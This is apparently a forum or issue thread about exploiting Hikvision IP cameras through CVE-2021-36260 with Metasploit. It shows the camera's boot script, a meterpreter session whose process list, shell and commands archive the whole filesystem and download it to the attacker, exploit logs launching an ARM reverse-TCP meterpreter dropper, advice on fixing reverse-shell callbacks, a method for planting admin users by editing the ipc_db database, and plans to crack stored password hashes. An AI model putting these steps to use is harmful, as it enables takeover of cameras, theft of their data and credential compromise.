ln -s /bin/da_info getAlarmStatus
ln -s /bin/da_info setAppwebDebug
ln -s /bin/da_info getUserOnlineInfo
ln -s /bin/da_info getAppwebStatus

ln -s /bin/da_info testOneKey
ln -s /bin/da_info testOneKeyStart
ln -s /bin/da_info testDspFun

#▒綯▒▒ͷ
ln -s /bin/da_info setLensZoomPos
ln -s /bin/da_info getLensZoomPos
ln -s /bin/da_info getLensCurve
ln -s /bin/da_info prtLensCurve
ln -s /bin/da_info setAgingMode
ln -s /bin/da_info getAgingMode
ln -s /bin/da_info setAgingTime
ln -s /bin/da_info getAgingTime
ln -s /bin/da_info camCmd
ln -s /bin/da_info IPZOOMDebug



ln -s /dav/da_info prtLockList

ln -s /bin/da_info startSaveAlarmInfo
ln -s /bin/da_info stopSaveAlarmInfo
ln -s /bin/da_info copyAlarmInfo

echo 1 > /proc/sys/vm/overcommit_memory #add by liyong---▒ڴ▒▒▒䣬▒▒▒▒▒▒Ϊ▒▒▒▒▒ڴ▒▒С,▒▒▒▒▒ڴ▒▒▒ŷ▒▒䲻▒▒


cd /home
chmod 777 *
chmod +x /bin/*
echo "Insmod ko start..."
tar zxf /dav/r2_modules.tar.gz --lzma -C /home

mv -f r2_modules/8192cu.ko r2_modules/8188eu.ko r2_modules/smart_config.ko r2_modules/event_notify.ko r2_modules/ptmotor.ko r2_modules/motor_icr.ko r2_modules/an41908.ko r2_modules/sspi.ko r2_modules/ipc_stm8.ko r2_modules/alarm.ko r2_modules/watch.ko r2_modules/base.ko /home
insmod /home/base.ko
insmod /home/sspi.ko
insmod /home/motor_icr.ko
insmod /home/ipc_stm8.ko
insmod /home/watch.ko
echo "Insmod ko end..."

echo "Press Ctrl-C to stop ..."
/bin/execSystemCmd &
sleep 1
/home/process/daemon_fsp_app &
sleep 2
/home/process/database_process &
/home/process/net_process &


sleep 2
echo "App Start ..."
#tar zxf /dav/IEfile.tar.gz -C /home/webLib
tar zxf /dav/IEfile.tar.gz --lzma -C /home/webLib
#tar zxf /dav/zh.tar.gz -C /home/doc/xml
#tar zxf /dav/en.tar.gz -C /home/doc/xml
echo "IEfile uncompressed."

ln -s /dav/WebComponents.exe /home/webLib/codebase/WebComponents.exe

rm /home/process/net_process
rm /home/process/database_process
rm /home/sspi.ko
rm /home/motor_icr.ko

ps from msfw shows database_process net_process are already deleted as we can see at end of starting script

meterpreter > ps

Process List
============

 PID    PPID  Name              Arch       User   Path
 ---    ----  ----              ----       ----   ----
 3      2     [ksoftirqd/0]     armv5tejl  admin
 4      2     [kworker/0:0]     armv5tejl  admin
 6      2     [rcu_kthread]     armv5tejl  admin
 7      2     [khelper]         armv5tejl  admin
 8      2     [sync_supers]     armv5tejl  admin
 9      2     [bdi-default]     armv5tejl  admin
 10     2     [kblockd]         armv5tejl  admin
 11     2     [khubd]           armv5tejl  admin
 12     2     [cfg80211]        armv5tejl  admin
 13     2     [kworker/0:1]     armv5tejl  admin
 14     2     [rpciod]          armv5tejl  admin
 15     2     [kswapd0]         armv5tejl  admin
 16     2     [ksmd]            armv5tejl  admin
 17     2     [fsnotify_mark]   armv5tejl  admin
 18     2     [nfsiod]          armv5tejl  admin
 19     2     [crypto]          armv5tejl  admin
 32     2     [mtdblock0]       armv5tejl  admin
 33     2     [mtdblock1]       armv5tejl  admin
 34     2     [mtdblock2]       armv5tejl  admin
 35     2     [mtdblock3]       armv5tejl  admin
 36     2     [mtdblock4]       armv5tejl  admin
 37     2     [mtdblock5]       armv5tejl  admin
 38     2     [mtdblock6]       armv5tejl  admin
 39     2     [kworker/u:1]     armv5tejl  admin
 61     1     udevd             arm        admin  /sbin/udevd
 152    1     dropbear          arm        admin  /sbin/dropbear
 159    1     network_deamon    arm        admin  /bin/network_deamon
 217    2     [jffs2_gcd_mtd6]  armv5tejl  admin
 299    2     [mark_mergeable]  armv5tejl  admin
 300    1     execSystemCmd     arm        admin  /bin/execSystemCmd
 302    1     daemon_fsp_app    arm        admin  /home/process/daemon_fsp_app
 306    1     database_process  armv5tejl  admin  /home/process/database_process (deleted)
 307    1     net_process       armv5tejl  admin  /home/process/net_process (deleted)
 324    1     psh               arm        admin  /bin/psh
 326    1     davinci           armv5tejl  admin  /home/davinci (deleted)
 909    1     d                 arm        admin  /tmp/d
 910    909   d                 arm        admin  /tmp/d
 6499   1     F                 armv5tejl  admin  /tmp/F (deleted)
 6503   1     F                 armv5tejl  admin  /tmp/F (deleted)
 6508   1     F                 armv5tejl  admin  /tmp/F (deleted)
 16513  2     [kworker/u:2]     armv5tejl  admin

why not create tgz of working filesystem and download will be easier than using binwalk

meterpreter > shell
Process 6646 created.
Channel 12 created.
cd /
tar czvf /dev/fs.tgz  bin dav devinfo etc home init lib linuxrc opt root sbin srv sys var
ls -la /dev/fs*
-rw-r--r--    1 admin    root      14775736 Jun 24 07:47 /dev/fs.tgz
exit
meterpreter > download /dev/fs.tgz
[*] Downloading: /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 1.00 MiB of 14.09 MiB (7.1%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 2.00 MiB of 14.09 MiB (14.19%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 3.00 MiB of 14.09 MiB (21.29%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 4.00 MiB of 14.09 MiB (28.39%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 5.00 MiB of 14.09 MiB (35.48%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 6.00 MiB of 14.09 MiB (42.58%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 7.00 MiB of 14.09 MiB (49.68%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 8.00 MiB of 14.09 MiB (56.77%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 9.00 MiB of 14.09 MiB (63.87%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 10.00 MiB of 14.09 MiB (70.97%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 11.00 MiB of 14.09 MiB (78.06%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 12.00 MiB of 14.09 MiB (85.16%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 13.00 MiB of 14.09 MiB (92.26%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 14.00 MiB of 14.09 MiB (99.35%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] Downloaded 14.09 MiB of 14.09 MiB (100.0%): /dev/fs.tgz -> /home/aviko/fs.tgz
[*] download   : /dev/fs.tgz -> /home/aviko/fs.tgz
meterpreter > rm /dev/fs.tgz

done
dahua.zip
fs.zip
enjoy :)
yes i know filename is dahua but its hivision of course

[Doublefire-Chen]

ip on pc with msf is public_ip or you are behind nat?

My PC and target cam both are in our campus Lan.

[Doublefire-Chen]

ip on pc with msf is public_ip or you are behind nat?

I don't have public ip address.

[avikowy]

your ip and cam ip are in same subnet ?

[Doublefire-Chen]

your ip and cam ip are in same subnet ?

No

[avikowy]

if cam cant contact with you at ip you set in LHOST and port 4444 it will not work, imagine you wait for important call but you didnt inform caller what is your phone number or you turned phone off

[Doublefire-Chen]

if cam cant contact with you at ip you set in LHOST and port 4444 it will not work, imagine you wait for important call but you didnt inform caller what is your phone number or you turned phone off

But why can I use POC on https://github.com/Aiminsun/CVE-2021-36260 to get the target shell?

[avikowy]

most probably because you call to camera which is reachable at its ip and port you told her to open for you

[Doublefire-Chen]

if cam cant contact with you at ip you set in LHOST and port 4444 it will not work, imagine you wait for important call but you didnt inform caller what is your phone number or you turned phone off

It seems that I forget to open my port 4444😂Must I open it manually?

[avikowy]

[] Started reverse TCP handler on Yo.ur.ip:4444
[] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. It appears the target executed the provided sleep command.
[] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[] Command Stager progress - 0.38% done (25/6605 bytes)
[] Command Stager progress - 0.76% done (50/6605 bytes)
[] Command Stager progress - 1.14% done (75/6605 bytes)
[] Command Stager progress - 1.51% done (100/6605 bytes)

[Doublefire-Chen]

[] Started reverse TCP handler on Yo.ur.ip:4444 [] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. It appears the target executed the provided sleep command. [] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp [] Command Stager progress - 0.38% done (25/6605 bytes) [] Command Stager progress - 0.76% done (50/6605 bytes) [] Command Stager progress - 1.14% done (75/6605 bytes) [] Command Stager progress - 1.51% done (100/6605 bytes)

Mine is the same with you.

[avikowy]

if poc is working metasploit has to work too, there is no other option. try again but this time skip "set target 1" part (or if you did not use it before now its good moment to try) this simply set from which way connection is initiated. without target=1 you initiate connection and trying to connect to cam, with target set to 1 you inform cam that cam has to call to you after payload is finished sending because you cannot reach her (or it whatever...) I am really trying to help but it looks like conversation of deaf with blind. You say "it did not work for me" and I am trying to figure out why but I am shooting in darkness with hope I will hit reason.

[Doublefire-Chen]

if poc is working metasploit has to work too, there is no other option. try again but this time skip "set target 1" part (or if you did not use it before now its good moment to try) this simply set from which way connection is initiated. without target=1 you initiate connection and trying to connect to cam, with target set to 1 you inform cam that cam has to call to you after payload is finished sending because you cannot reach her (or it whatever...) I am really trying to help but it looks like conversation of deaf with blind. You say "it did not work for me" and I am trying to figure out why but I am shooting in darkness with hope I will hit reason.

Thank you for your generous help.

Now it still doesn't work though I set target as 0.

[avikowy]

tell me in which word I said anything about 0 ? world is not just binary. I told you to SKIP that step.
fuck that, its 5:20am here, just use tftp or scp. figure it out how to. and dont even try to convince me such commands didnot work because both are compiled in busybox by default. also poc uses ssh by connecting into camera, it launch dropbear at 1337 as i remember.
you got fishing rod, fish you have catch by yourself.

[Doublefire-Chen]

tell me in which word I said anything about 0 ? world is not just binary. I told you to SKIP that step. fuck that, its 5:20am here, just use tftp or scp. figure it out how to. and dont even try to convince me such commands didnot work because both are compiled in busybox by default. also poc uses ssh by connecting into camera, it launch dropbear at 1337 as i remember. you got fishing rod, fish you have catch by yourself.

Well, I just do what the same as the video do, ……
And you can see it by yourself that I did can't use tftp and scp. I am also confused about why I can't use these command in a so-called busybox. Maybe for secure reason, the developer delete the link. Master, just take a good rest. I will try another way.

[avikowy]

a little update:
took a cam with cve-2021-36260 and weak known pwd, added 4 dummy users 111111 2222 3333 44444 (length is not important atm)
downloaded ipc_db, opened in sqlitebrowser, replaced entries for 222 333 444 as shown below:

uploaded modified ipc_db, reboot, logged in as admin and voila:

questions? :)

[joycechu]

Through grep, I find the encryption algorithm is in /dav/process/davinci file.
By the command '/usr/sbin/dropbear -R -I 1800' will trigger the davince to re-write /etc/passwd, and the encrypted password that stored in ipc_db will be writed into passwd file. Then using John the Ripper crack the passwd.
I attempt to reverse davinci using RetDec decompiler (Ghidra maybe more better), find that passwd seems use AES encryption.

If some guys familiar with reverse reverse engineering can find the encryption processing.

[Aha1976]

a little update: took a cam with cve-2021-36260 and weak known pwd, added 4 dummy users 111111 2222 3333 44444 (length is not important atm) downloaded ipc_db, opened in sqlitebrowser, replaced entries for 222 333 444 as shown below:

uploaded modified ipc_db, reboot, logged in as admin and voila:

questions? :)

someone explain. if you have access to the file system of the camera, how can you download the file ipc_db to the local computer if the camera is not in the local network? and then pour it back into the camera?